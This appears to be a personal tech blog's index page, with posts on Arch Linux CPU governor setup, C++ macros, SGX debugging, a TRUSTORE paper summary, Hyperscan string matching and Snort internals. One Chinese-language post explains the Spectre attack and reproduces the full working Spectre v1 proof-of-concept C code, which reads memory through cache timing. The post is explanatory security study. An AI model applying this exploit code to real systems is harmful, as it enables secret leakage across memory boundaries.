Home on Xiangyi's Blog

Build ATLAS under Arch Linux

Thu, 18 Nov 2021 16:17:06 +0800

Orginal post: https://aur.archlinux.org/packages/atlas-lapack/?O=10&PP=20#comment-599526

Hey I just installed, and make these notes, that might be useful for somebody else: Good explanation in atlas site: http://math-atlas.sourceforge.net/atlas_install/node5.html

Follow this, the governor set by cpupower knows shit about CPU without this: http://unix.stackexchange.com/questions/121410/setting-cpu-governor-to-on-demand-or-conservative Summary: http://vincent.jousse.org/tech/archlinux-compile-lapack-atlas-kaldi/

===========Steps===========
Permanent disable intel_pstate:

$ vi /etc/default/grub  
GRUB_CMDLINE_LINUX_DEFAULT="intel_pstate=disable"

and update grub:

$ grub-mkconfig -o /boot/grub/grub.cfg

And then enable acpi-cpufreq module:

su root
echo "acpi-cpufreq" > /etc/modules-load.d/acpi-cpufreq.conf

restart.

Now cpupower can set frequencies properly.

TextTruth KDD18 Summary

Tue, 09 Nov 2021 15:35:06 +0800

Source paper: TextTruth: An Unsupervised Approach to Discover Trustworthy Information from Multi-Sourced Text Data (KDD 18')

Fundamental Principles of Truth Discovery

If a user provides much trustworthy information or true answers, his/her reliability is high
If an answer is supported by many reliable users, this answer is more likely to be true

Challenges in text data

Unstructured and noisy
For a factoid question¹, the answer may be multifactorial and it’s usually hard for a given text answer to cover all the factors. Such circumstance lead to the so-called partially correct phenomenon²
Diversity of word usages. For example, one can use words such as tired or exhausted to describe the symptom of fatigue

Keywords and Factors

Take question “What are the symptoms of flu?” as a simple example. It may have several answers, say “One may feel very cold and exhausted”. From answers like the given one, we can extract some keywords like: “freezing”, “cold”, “tired”, “exhausted”, “running nose” and “congestion”. In those answers, it is obvious that some different keywords represent same meaning, here we call the meaning factor, e.g., “cold” and “freezing” belong to the factor “chills”, and, “tired”, together with “exhausted”, belong to the factor “fatigue”.

C++的两个预处理宏特性

Tue, 06 Jul 2021 22:20:36 +0800

今天多次在开源项目SerenityOS中见到两个以前很少见的与字符串相关的C++预处理特性，故记录如下（之前应该也遇到过，但印象不是很深，希望这次能够牢记）

首先看这段代码

#define ENUMERATE_SYSCALLS(S)     \
    S(yield)                      \
    S(open)                       \
    S(close)                      \
    S(read)                       \
    S(lseek)                      \
    S(kill)                       
    /* remaining syscalls omitted... */ 
    
namespace Syscall {

enum Function {
#undef __ENUMERATE_SYSCALL
#define __ENUMERATE_SYSCALL(x) SC_##x,
    ENUMERATE_SYSCALLS(__ENUMERATE_SYSCALL)
#undef __ENUMERATE_SYSCALL
        __Count
};

constexpr const char* to_string(Function function)
{
    switch (function) {
#undef __ENUMERATE_SYSCALL
#define __ENUMERATE_SYSCALL(x) \
    case SC_##x:               \
        return #x;
        ENUMERATE_SYSCALLS(__ENUMERATE_SYSCALL)
#undef __ENUMERATE_SYSCALL
    default:
        break;
    }
    return "Unknown";
}

这段代码乍一看很容易理解，第一个宏ENUMERATE_SYSCALLS(S)展开为一系列的S(系统调用名)，至于其具体含义暂且不论。但第二个宏非常令人费解，什么是SC_##x呢？如果忽视这个问题继续分析这个宏定义，那么它的展开则非常简单，就是SC_##x,。下一行用到了第一个宏，将S替换为__ENUMERATE_SYSCALL。因此，这个宏的展开就是一系列的__ENUMERATE_SYSCALL(系统调用名)，再展开一次，就变成一系列的SC_##系统调用名。再结合外面的枚举定义的语句来看，这段代码定义了一系列的系统调用的枚举。但转念一想，C++规定其标识符不可以出现除了_（某些编译器还支持$）之外的特殊符号。所以如果简单的展开为SC_##open肯定是不对的。

Enable SGX Debugging in VS Code

Fri, 04 Jun 2021 17:43:36 +0800

Intel has provided sgx-gdb for conveniently debugging SGX applications. However, it can only be interacted via terminal, which may be a little bit hard for beginners. This article introduces how to debug SGX applications in VS Code.

Prerequisites

An SGX-compatible Linux system
Visual Studio Code
Fully SGX environment (with debug symbol installed, if not please follow this instruction)
VS Code Extension: Native Debug installed

Steps

Open the SGX project folder with your VS Code, and click the following icon in the left sidebar (or press Ctrl+Shift+D) to open RUN AND DEBUG window.
Add a new configuration, and then an launch.json file will be opened.
Copy the following lines to the file:

{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "(sgx) Debug",
            "type": "gdb",
            "request": "launch",
            "target": "app",
            "cwd": "${workspaceRoot}/",
            "valuesFormatting": "parseText",
            "gdbpath": "sgx-gdb"
        }
    ]
}

This configuration assumes that your executable file is named as app and at the root directory of your project. If not, please modify the cwd (current working directory) and target (executable binary) values.

Spectre Attack POC代码分析

Thu, 03 Jun 2021 20:24:36 +0800

Ref.: Spectre Attacks: Exploiting Speculative Execution

最近看到Spectre Attack（幽灵攻击），这是一个利用CPU乱序执行的漏洞而进行的攻击。虽说此漏洞早在18年初就已经被发现并公布，但这种基于Cache Timing的攻击方式仍然十分具有借鉴意义，特此撰文介绍该漏洞的原理以及具体POC的实现。

原理

大家都知道，现代CPU为了加快指令执行的整套流程引入了很多机制，从最初的流水线机制，到后面为了解决指令执行周期不一致引发的流水线停车问题而引入的推测执行、分支预测以及乱序执行机制等，这些机制无一例外的加快了CPU的效率，但效率总是伴随着一定的代价，这些复杂的机制也不可避免地引入了许许多多潜在的安全问题，幽灵攻击既是其中之一。通常，分支的最终目标指令都取决于前序指令所计算出的某个内存中的值，CPU为了加快执行效率，会试图推测该目标指令并提前执行该指令，然后将结果暂存。当该值可用时，CPU会根据该值选择销毁或者提交推测运行的结果。很遗憾，推测逻辑并不可靠，因为这会使得CPU访问一些本不应该被访问到内存区域和寄存器，并将部分内容（很可能是一些敏感信息）留在缓存内，从而引入一些可观测的副作用（通过侧信道）。

如何攻击？

在原理中，我们讲到了通过推测执行以及侧信道来获取本不应该被访问的内存区域的内容。实现这一目标的前提是，让CPU预测式地执行错误的分支，这需要我们精心设计方法来引导CPU以及受害者去进行这一推测执行，这一步骤可以被称为训练步骤，通常，我们可以通过操纵缓存状态从而移除CPU所需的决定实际控制流的数据来实现这一目标（下文中结合代码详细解释）。接下来，便可以通过预测执行的方式，让CPU读取特定的内容，从而利用侧信道，根据访问时间的不同来判断cache命中与否，进而推断出内存中的内容。接下来，我们以一段很简单的条件分支代码为例，具体描述整个流程：

if (x < array1_size)
    y = array2[array1[x] * 4096];

考虑上述代码段为一个函数中的一部分，其接受从非可信源输入的无符号整数x，运行这段代码的进程可以访问大小为array1_size的无符号字节数组array1以及大小为1MB的字节数组array2。这段代码首先对x进行边界检查，来防止对array1的访问出现越界情况。否则，一个越界的访问可能会触发异常，或者导致某些不可访问的敏感区域被访问到（通过提供x = (待读取秘密字节的地址) − (array1的基址)）。下表列出了几种不同的预测和实际情况组合所导致的结果，其中列代表实际结果，行代表预测结果。

结果	对	错
对	高速	低速
错	泄露	高速

可以发现，假如实际结果为错但预测结果为对时，就会招致信息泄露，其原因为何呢？让我们来假定实际情况满足以下前提：

恶意选取一个越界的值赋予x，使得array1[x]表示一个受害者的敏感信息字节k；
array1_size和array2没有被缓存，但k被缓存了；
如果前序操作处理的x被判作有效，那么分支预测器会将推断下一次的条件判断也为真

当上面编译的代码运行时，处理器首先将x的恶意值与array1_size进行比较。读取array1_size会导致缓存未命中，并且处理器将会等待较长时间直到其从DRAM被加载到寄存器中。特别地，如果分支条件或分支前某处的指令需要等待未缓存的操作数，则该分支结果的确定可能需要一些时间。同时，分支预测器假设结果为真。因此，推测执行逻辑将x与array1的基址相加，并从内存中请求结果地址处的数据。这次读取将会命中缓存（上文中假设k被缓存），并快速返回敏感信息字节k的值。推测执行逻辑然后使用 k 来计算 array2[k * 4096] 的地址。然后它发送一个请求从内存中读取这个地址（导致缓存未命中）。虽然从 array2 的读取已经在进行中，但分支结果也可能在其间被确定。此时，处理器意识到其推测执行选择是错误的，因此，回滚其寄存器状态。但是，对array2的预测读取以特定于地址的方式影响缓存状态，其地址取决于k。为了完成攻击，我们可以通过Flush+Reload或Prime+Probe等基于缓存的侧信道攻击来观测array2的哪个位置被载入了缓存。这将会揭露k的值，因为受害者的推测执行缓存了array2[k*4096]。当然，通过Evict+Time这一方法也可以实现同样的目标。

PoC代码实现

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h>        /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h>     /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64]; 
uint8_t array2[256 * 512];

char *secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0;  /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x) {
	if (x < array1_size) {
		temp &= array2[array1[x] * 512];
	}
}


/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80)  /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
	static int results[256];
	int tries, i, j, k, mix_i, junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t *addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;
	for (tries = 999; tries > 0; tries--) {

		/* Flush array2[256*(0..255)] from cache */
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]);  /* intrinsic for clflush instruction */

		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--) {
			_mm_clflush(&array1_size);
			for (volatile int z = 0; z < 100; z++) {}  /* Delay (can also mfence) */

			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
			/* Avoid jumps in case those tip off the branch predictor */
			x = ((j % 6) - 1) & ~0xFFFF;   /* Set x=FFF.FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16));           /* Set x=-1 if j&6=0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));
			
			/* Call the victim! */
			victim_function(x);
		}

		/* Time reads. Order is lightly mixed up to prevent stride prediction */
		for (i = 0; i < 256; i++) {
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp(&junk);            /* READ TIMER */
			junk = *addr;                       /* MEMORY ACCESS TO TIME */
			time2 = __rdtscp(&junk) - time1;    /* READ TIMER & COMPUTE ELAPSED TIME */
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++;  /* cache hit - add +1 to score for this value */
		}

		/* Locate highest & second-highest results results tallies in j/k */
		j = k = -1;
		for (i = 0; i < 256; i++) {
			if (j < 0 || results[i] >= results[j]) {
				k = j;
				j = i;
			} else if (k < 0 || results[i] >= results[k]) {
				k = i;
			}
		}
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break;  /* Clear success if best is > 2*runner-up + 5 or 2/0) */
	}
	results[0] ^= junk;  /* use junk so code above won't get optimized out*/
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
}

int main(int argc, const char **argv) {
	size_t malicious_x=(size_t)(secret-(char*)array1);   /* default for malicious_x */
	int i, score[2], len=40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1;    /* write to array2 so in RAM not copy-on-write zero pages */
	if (argc == 3) {
		sscanf(argv[1], "%p", (void**)(&malicious_x));
		malicious_x -= (size_t)array1;  /* Convert input value into a pointer */
		sscanf(argv[2], "%d", &len);
	}
	
	printf("Reading %d bytes:\n", len);
	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d    ", value[0], 
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}
	return (0);
}

PoC代码分析

这是一个简单的PoC，其在同一进程内模拟窃取行为。我们想要窃取到的数据为：

CCS20 TRUSTORE论文解读

Sun, 30 May 2021 17:06:36 +0800

TRUSTORE: Side-Channel Resistant Storage for SGX using Intel Hybrid CPU-FPGA

TRUSTORE发表于CCS20的Session 6C Side Channels上，是一篇针对于现有SGX技术很容易遭到Side Channel攻击这一问题来进行研究的文章，其中应用了FPGA，将可信区从SGX本身拓展到了FPGA，实现了一个可信的存储模块。

摘要

现有的SGX容易遭受到侧信道攻击（页错误、缓存、分支预测、推测式执行等），虽然ORAM技术从理论上保证了SGX可以免除侧信道的危害，但是其具有严重的性能问题。这篇文章介绍了一个新成果：TRUSTORE，利用FPGA这一外设，实现了一个可信的存储服务，并且保证该存储服务与侧信道完全隔绝。TRUSTORE主要解决了以下三个问题：

在不改变系统架构的前提下，将可信范围从SGX拓展到FPGA上；
为SGX应用与FPGA之间提供一个可验证的安全连接通道；
为SGX应用提供无缝的多重操作支持（怎样理解无缝？）。

SGX中的侧信道攻击以及常规ORAM方法的局限性

目前，常见的针对SGX的侧信道攻击大都基于存储结构，例如基于页错误的攻击，基于缓存的攻击（flush+reload，evict+reload，evict+time等等），基于分支预测的攻击以及基于推测执行的攻击等等。通过这些侧信道攻击，攻击者可以获取到本应被SGX保护的敏感信息。

针对这一系列攻击，许多基于ORAM的方法被提出并应用于侧信道的保护上。但由于对于每次内存访问，ORAM都需要访问整个访问路径树（对大小为N的数据，需要额外O(LogN)的内存访问次数），这使得ORAM的性能受到了极大的限制。实验结果表明，ORAM的额外开销相较于原生enclave执行缓慢了两个数量级。此外，当访问的数据大小变大时，ORAM的速度呈指数级衰减。

正因常规ORAM方法在解决SGX的侧信道攻击时具有很大的局限性，如何高效地预防SGX中的侧信道攻击成为了亟待解决的问题。事实上，与SGX相关的基于存储的侧信道攻击，大都因为相应的存储单元（内存，缓存，页表，分支预测单元等）是被计算机上不同应用（不管被信任与否）所共享的。在这篇文章中，作者提出了一个观点：如果我们将SGX所利用的存储单元与这些共享存储单元隔绝开，其相应的侧信道是否在很大程度上会被隔绝？

TRUSTORE简介

基于上文中的观点，作者设计了TRUSTORE，也即一个在与其他存储设备相隔离的FPGA中的可信存储模块。由于TRUSTORE有着独立的内存单元，故其从设计上阻断了存储单元相关的侧信道。在设计TRUSTORE并将其与SGX相结合的过程中，作者遇到并解决了以下三个挑战：

在不改变系统架构的前提下，将可信范围从SGX拓展到FPGA上；
为SGX应用与FPGA之间提供一个高速的可验证安全连接通道；
为SGX应用提供无缝的多重操作支持（怎样理解无缝？）。

本文的威胁模型

Enclave的假设

假定用户想要在一台远程机器上里用SGX安全地运行一个应用。攻击者了解这个应用的内容和源代码，所以代码本身并不是敏感信息。但，用户向enclave提供的数据是敏感的，因此这些数据需要被保护以免受到侧信道攻击。在TRUSTORE中，作者假设单一一方（如enclave应用开发者）会将TRUSTORE服务引入FPGA设备中。但对于某些服务，开发者可以在一台设备中运行多个enclave，并且这些enclave可以同时访问同一块FPGA。

硬件假设

TRUSTORE的有效性基于以下硬件层面的假设：CPU与FPGA芯片不会被篡改且其功能被正确实现。此外，作者假设攻击者不能从芯片封装内直接获取到秘密信息或者使当前状态混乱。温度与功耗侧信道不在TRUSTORE的考虑范围中。

攻击者的能力

攻击者拥有控制全部软件组成（如BIOS，OS，VMM以及设备驱动程序）的特权。此外，攻击者可以控制除FPGA之外的所有外设，所有的非EPC内存也都可以被攻击者控制（例如DMA与MMIO缓冲区）。与EPC类似，尽管攻击者不能直接访问被TRUSTORE保护的FPGA DRAM，他们也可以发起相关的侧信道攻击。

TRUSTORE的设计

TRUSTORE分为两部分，TRUSTLIB和TRUSTMOD。

TRUSTLIB是运行在enclave内的模块，其主要作用是建立和维护enclave程序和可信存储设备（FPGA）之间的通信通道。
TRUSTMOD是运行在FPGA上的模块，其是可信存储的核心模块。（其实现了一个基于FPGA板载内存的key-value存储机制，该机制可以在为多个enclave提供存储服务的同时，通过强行访问控制来保证enclave中的数据安全。）

在介绍完这两个模块之后，文章讨论了如何利用MMIO与DMA来高效的将这辆各模块进行连接与组合。

名词解读：

MMIO，也既内存映射IO，在MMIO中，内存和I/O设备共享同一个地址空间。 MMIO是应用得最为广泛的一种IO方法，它使用相同的地址总线来处理内存和I/O设备，I/O设备的内存和寄存器被映射到与之相关联的地址。当CPU访问某个内存地址时，它可能是物理内存，也可以是某个I/O设备的内存。因此，用于访问内存的CPU指令也可来访问I/O设备。每个I/O设备监视CPU的地址总线，一旦CPU访问分配给它的地址，它就做出响应，将数据总线连接到需要访问的设备硬件寄存器。为了容纳I/O设备，CPU必须预留给I/O一个地址区域，该地址区域不能给物理内存使用。

DMA，也既直接内存访问，DMA传输时将数据从一个地址空间复制到另外一个地址空间。当CPU初始化这个传输动作，传输动作本身是由 DMA控制器来实行和完成。典型的例子就是移动一个外部内存的区块到芯片内部更快的内存区。像是这样的操作并没有让处理器工作拖延，反而可以被重新排程去处理其他的工作。DMA 传输对于高效能嵌入式系统算法和网络是很重要的。在实现DMA传输时，是由DMA控制器直接掌管总线，因此，存在着一个总线控制权转移问题。即DMA传输前，CPU要把总线控制权交给DMA控制器，而在结束DMA传输后，DMA控制器应立即把总线控制权再交回给CPU。一个完整的DMA传输过程必须经过DMA请求、DMA响应、DMA传输、DMA结束4个步骤。

TRUSTMOD的加载与验证

TRUSTMOD需要被编译成比特流并加载进FPGA开发板上，因此，如何保证其在加载到板上之后的保密性和完整性是这部分主要解决的问题。

比特流的加载

通过FPGA的安全启动流程，TRUSTMOD可以保证比特流在加载到板上之后，其中内容不会被窃取。具体来说，开发者首先准备好TRUSTMOD的比特流，并将该比特流上传到FPGA厂商来进行签名和加密（假设FPGA厂商可信），最后将正确加密并签名比特流烧入FPGA中，FPGA自身解密并写入自身逻辑模块。但显然，这一过程只能保证烧入的比特流的内容不被外界知晓，并不能保证FPGA始终运行正确可靠的比特流。因此，TRUSTMOD借鉴了SGX中的remote attestation过程，并借助TRUSTLIB实现了一套自身的验证流程。

密钥管理与验证过程

在介绍如何验证之前，我们先来介绍密钥管理方法，其过程如下图所示： 图1：TRUSTMOD加载过程中的密钥管理

步骤⓪指出，FPGA厂商在出厂前会为每块开发板准备好相应的三个密钥$k_{Pub}^{bitstr},k_{Priv}^{bitstr},k_{AES}^{bitstr}$来用作安全启动的保证。为了实现验证操作，如步骤①所示，TRUSTMOD也会在每次编译之前（来保证不同TRUSTMOD设备的密钥不同）生成一对密钥$k_{Pub}^{attest},k_{Priv}^{attest}$，并把私钥$k_{Priv}^{attest}$附加在编译好的比特流中，公钥则会被提供给TRUSTLIB以便进行后续操作，这是图示中的步骤②。当FPGA接收到加密并签名过的TRUSTMOD比特流之后，其就会进行相应的验证操作，如果验证无误，则将解密之后的TRUSTMOD模块载入逻辑阵列中，如步骤③。接下来，为了在CPU与FPGA之间建立起一条可靠的信道，TRUSTLIB将会发起对TRUSTMOD的验证。其过程如下图所示： 图2：TRUSTMOD与TRUSTLIB的验证过程

为了保证验证消息的新鲜性，在发起验证的最初，TRUSTLIB首先要产生一个随机nonce并发给TRUSTMOD，TRUSTMOD接受到这个nonce之后，利用$k_{Priv}^{attest}$对其进行签名并发回至TRUSTLIB供其进行验证。若验证通过，则开始发起Diffie–Hellman密钥交换，最终得到一个公共密钥，至此安全信道建立成功。这个机制保证了，只要$k_{Priv}^{attest}$不被泄露，即使攻击者改写了FPGA的比特流内容，也会在进行验证时被TRUSTLIB发现。

TRUSTMOD的存储模型

关于存储模型，主要考虑三个问题，第一：怎么存，也既存储内容在存储器中的物理和逻辑组织结构是什么；第二：怎么管，也既内容可以被谁访问，可以被怎样访问。对于怎么存这个问题，从概念出发，我们要考虑内容以什么格式组织在存储器中，并通过怎样的方式寻址。对于怎么管这个问题，我们主要考虑访问控制以及如何响应相应的存储操作请求。此外，可能存在的内存碎片问题也是TRUSTMOD需要解决的问题之一。

怎么存

寻址：由于FPGA硬件本身的特性，TRUSTMOD直接访问FPGA的存储器，所以寻址方式可以被简单地定义为直接寻址。由于不存在CPU中的应用所必须涉及到的缓存，页表等结构，其可能遭受的侧信道攻击面被显著地削减。
存储格式：由于FPGA的板载存储器（DRAM）的地址空间是线性的，因此数据可以简单的按起始地址+偏移量（也既数据大小）这一方式来管理。具体地，TRUSTMOD将所有被分配的内存记录到一个叫片上内存分配表（On-Chip Memory Allocation Table, OCMAT）的数据结构中，这个表包含以下属性：1）ID，也既一个数据对象的唯一标识符，被TRUSTMOD内部分配；2）EID，也既Enclave ID，是拥有该数据对象的enclave的唯一标识符；3）片上地址，也既该数据对象在FPGA片上存储器内的起始物理地址；4）长度，很显然，既是数据对象的大小。

怎么管

TRUSTMOD维护一个FIFO队列来记录每个enclave的内存操作请求，因此这些请求将会以先来先服务的形式被响应。如果队列满无法再接受新请求，TRUSTMOD将会通过推迟发送ACK信号的方式来让总线暂停接受新请求。

Compare the performance between inline assembly and C style Intel intrinsic

Wed, 26 May 2021 11:47:06 +0800

Modern CPU has many acceralating instructions, like Intel® SSE, AVX, AVX-512, and more. In order to invoke these instructions conveniently, Intel provided many C style functions that provide access to them, which can be found at here. In this article, we are going to compare the performance between those C style functions and its original inline assembly. The test environment is Visual Studio 2019 and Windows 10.

We use _mm256_add_ps/vaddps as a test case. But I think other instructions should have similar results. The test code is listed below:

Multithreading Models in Modern Operating System

Tue, 25 May 2021 14:55:36 +0800

There are two types of threads to be managed in a modern system: User threads and kernel threads. User threads are supported above the kernel, without kernel support. These are the threads that application programmers would put into and manage in their programs. Kernel threads are supported within the kernel of the OS itself. All modern OSes support kernel level threads, allowing the kernel to perform multiple simultaneous tasks and/or to service multiple kernel system calls simultaneously. In a specific implementation, the user threads must be mapped to kernel threads, using one of the following strategies.

Hyperscan's SIMD MPSM

Tue, 18 May 2021 02:22:06 +0800

Hyperscan是Intel联合相关单位开发的一套开源的C++高性能多模式正则匹配库，其实现大量的利用了现代CPU中的SIMD（单指令多数据流）指令来进行优化，通常被用于实现IDS/IPS系统中的DPI模块（例如Snort）。Hyperscan项目是经历了数年的长期开发，其核心技术被发表于NSDI‘19。本文将着重介绍Hyperscan中的SIMD多模字符串匹配算法。

在Hyperscan文中，该SIMD多模字符串匹配算法被称为FDR（纪念罗斯福…)，FDR旨在快速筛选出不需要进行详细匹配的字节流。具体而言，FDR改进了经典的Shift-or匹配算法，将其从单模式串精确匹配拓展到了多模式串模糊匹配（有概率出现假阳性FP），并利用了一系列的SIMD指令，对其性能进行了优化，在改进的Shift-or算法之后，FDR引入了一个验证模块，利用哈希和精确字符串匹配来过滤上一步中可能出现的FP。本文将首先介绍经典的Shift-or匹配算法，然后介绍FDR中的改进的多模Shift-or算法，并对其细节进行一系列的分析，最终介绍验证模块的相关内容。

经典的Shift-or字符串匹配算法

最常见的字符串匹配算法，也既暴力匹配，在遇到匹配失败的字符之后，会重新将模式串退回起始位置，然后将原文前进一个字符再次进行匹配，该操作符合人们的直觉，但会花费一些不必要的时间去匹配一些在前次匹配中已知可以匹配的子串。KMP算法引入了失配指针与next数组的概念，通过计算并存储模式串中部分子串的前缀与后缀的最长公共元素的长度，来缩减失配时所需要的回退的步数，从而减少算法运行的时间。KMP算法的详细过程本文不再赘述，有兴趣的读者可以在互联网上查阅相关资料。

Shift-and算法

在介绍Shift-or算法之前，我们先来介绍Shift-and算法，因为Shift-or算法仅为Shift-and算法的一个优化方案。Shift-and算法，其思想与KMP算法略有相似，都利用了前缀与后缀的关系，但Shift算法通过计算机中并行度较高的位运算，进一步加快了匹配的速度。给定模式串P，输入文本为S，Shift-and算法维护一个字符串集合D，D中记录了P中所有与S串当前已读部分的某个后缀相匹配的P的从头开始的子串，每当从S中读入一个新字符后，算法立即更新D，若D中存在一个串恰好为P，则表示匹配成功。实际应用中，维护一个位数组D来实现这一功能，现将具体流程总结如下：

1. 设P的长度为m，将位数组D表示为D=dm...d1，用D[j]表示dj，初始化D全为0;
2. D[j]=1，当且仅当P1...Pj是S1...Si的某个后缀（此时，S读到i处）；
3. 若D[m]=1，则S匹配P；
4. D的更新规则：当且仅当D[i]=1且Si+1=Pj+1时，D[i+1]=1。

在具体实现中，我们采用如下算式去对D进行位并行更新：D=((D<<1) | 1) & B[S[j]]，其中B为一个位数组的数组，对所有的P中的字符c，B维护如下特性：B[c].i也既B[c]的第i位为1，当且仅当P[i]=c，否则为0。在给出B的定义之后，接下来我会对更新算式进行详细的解释：

首先关注更新规则，当且仅当D[i]=1且Si+1=Pj+1时，D[i+1]=1。对于位数组D，其每一位表示模式串P从开头到该位对应的位置有无对应的匹配，因此，在已知当前位置的匹配情况D[i]，并想要进行上述更新操作时，很显然，我们可以发现D[i]与D[i+1]存在一个左移一位的关系。在更新过程中，D[i]的可能取值为0和1，若D[i]=0，则代表第i位不匹配，根据规则，第i+1位也不可能匹配，此时D[i+1]也应被置为0，该操作可以用一个左移操作被轻松的表示出来，也既更新算式中的D<<1；
若D[i\=1，则表示D[i+1]有机会为1，因此我们需要进行进一步的判断（Si+1=Pj+1是否成立？），在进行这个判断之前，假设该判断成立，该假设等价于对D进行左移操作，让D[i]=1这一位被传递到D[i+1]，注意此时前一位会被补0，因此我们对传递之后的D与上1，也既((D<<1) | 1)，从而保证每次传递都能使前序匹配信息不丢失。接下来，我们需要对假设（Si+1=Pj+1成立）进行验证，在这里，借助之前已经计算好的B，如果B[S[j]]的第i+1位为1，则证明假设成立，因此之前接受到上一位传递的1应被保留，反之，则应置为0，这一操作符合与操作的概念，因此，我们用D=((D<<1) | 1) & B[S[j]]来实现这一更新。

优点：位数组的每一位都可以表示一个字符，且位运算在CPU内是高度并行化的，所以，相较于KMP算法，该算法更加高效。现将C++实现贴至下方：

// implementation by bitset
int shift_and_bitset(std::string source, std::string pattern)
{
    size_t src_len = source.length(), pat_len = pattern.length();
    // assume character set is A-Za-z, 52 chars
    std::bitset<64> B[52]; // pat_len should less than or equal to 64
    std::bitset<64> D;     // the bitset representing the prefix-matching status, initialized as 0x00...

    // initialization of B
    for (size_t i = 0; i < pat_len; i++)
    {
        // set the i-bit of B[pattern[i]] as 1
        B[pattern[i] - 'A'].set(i, true);
    }

    for (size_t i = 0; i < src_len; i++)
    {
        D = (D << 1).set(0, 1) & B[source[i] - 'A'];
        if (D[pat_len - 1])
        {
            return i;
        }
    }

    // return D[pat_len - 1];
    return -1;
}

// implementation by pure bitwise calculation
int shift_and_bitwise(std::string source, std::string pattern)
{
    size_t src_len = source.length(), pat_len = pattern.length();
    unsigned long long mask = 1 << (pat_len - 1);
    unsigned long long B[52] = {0};
    unsigned long long D = 0;

    // initialization of B
    for (size_t i = 0; i < pat_len; i++)
    {
        // set the i-bit of B[pattern[i]] as 1
        B[pattern[i] - 'A'] |= (1 << i);
    }

    for (size_t i = 0; i < src_len; i++)
    {
        D = (((D << 1)) | 1) & B[source[i] - 'A'];
        if (D & (1 << (pat_len - 1)))
        {
            return i;
        }
    }

    return -1;
}

相较于利用STL中的bitset实现，利用整型变量和位运算的实现更加高效，但是可读性有所降低。

Snort::Pig Code Insight

Mon, 10 May 2021 22:13:25 +0000

Snort::Pig Code Insight

Snort::Pig is the core class of Snort, in detail, every Packet thread is corresponding with an instance of Pig class, with the ability to be bound with a data source and handle its incoming packets (decode, pre-process, detect and do some actions). The definition of Pig class is listed as follows:

class Pig
{
public:
    Pig() = default;

    void set_index(unsigned index) { idx = index; }

    bool prep(const char* source);
    void start();
    void stop();

    bool queue_command(AnalyzerCommand*, bool orphan = false);
    void reap_commands();

    Analyzer* analyzer = nullptr;
    bool awaiting_privilege_change = false;
    bool requires_privileged_start = true;

private:
    void reap_command(AnalyzerCommand* ac);

    std::thread* athread = nullptr;
    unsigned idx = (unsigned)-1;
};

Snort::Analyzer Code Insight

Sun, 09 May 2021 23:38:19 +0000

Analyzer provides the packet acquisition and processing loop. Since it runs in a different thread, it also provides a command facility so that to control the thread and swap configuration.

Life Cycle

The Analyzer life cycle is managed as a finite state machine. It will start in the NEW state and will transition to the INITIALIZED state once the object is called as part of spinning off a packet thread. Further transitions will be prompted by commands from the main thread. From INITIALIZED, it will go to STARTED via the START command. Similarly, it will go from STARTED to RUNNING via the RUN command. Finally, it will end up in the STOPPED state when the Analyzer object has finished executing. This can be prompted by the STOP command, but may also happen if the Analyzer finishes its operation for other reasons (such as encountering an error condition). The one other state an Analyzer may be in is PAUSED, which will occur when it receives the PAUSE command while in the RUNNING state. A subsequent RESUME command will switch it back from PAUSED to RUNNING. One of the primary drivers of this state machine pattern is to allow the main thread to have synchronization points with the packet threads such that it can drop privileges at the correct time (based on the limitations of the selected DAQ module) prior to starting packet processing.

Snort Privilege Design

Fri, 07 May 2021 23:38:18 +0000

In modern operating system, each user or usergroup has its own privilege. Also, only a few users or groups can execute some privileged operations, like accessing /usr/bin, mounting a device to a specific location, reading data from a network interface card (NIC), etc. In this article, I take modern Linux as an example, towards a comprehensive explain of the privilege design in Snort.

Snort, as a intrusion detection system, is highly and frequently required to commnunicate with the NICs during its Data AcQuisition (DAQ) process. Hence, during those operations, Snort process are needed to be bound with a privileged user, allowing it to handle some necessary privileged operations. However, as stated in Snort::Analyzer Code Insight, and considering the execuating procedure of Snort, an Analyzer is not always in the DAQ process, nor in the RUNNING state. Such truth implies that privileges are not always required by the process.

C++中的值类别和引用

Mon, 03 May 2021 23:38:22 +0000

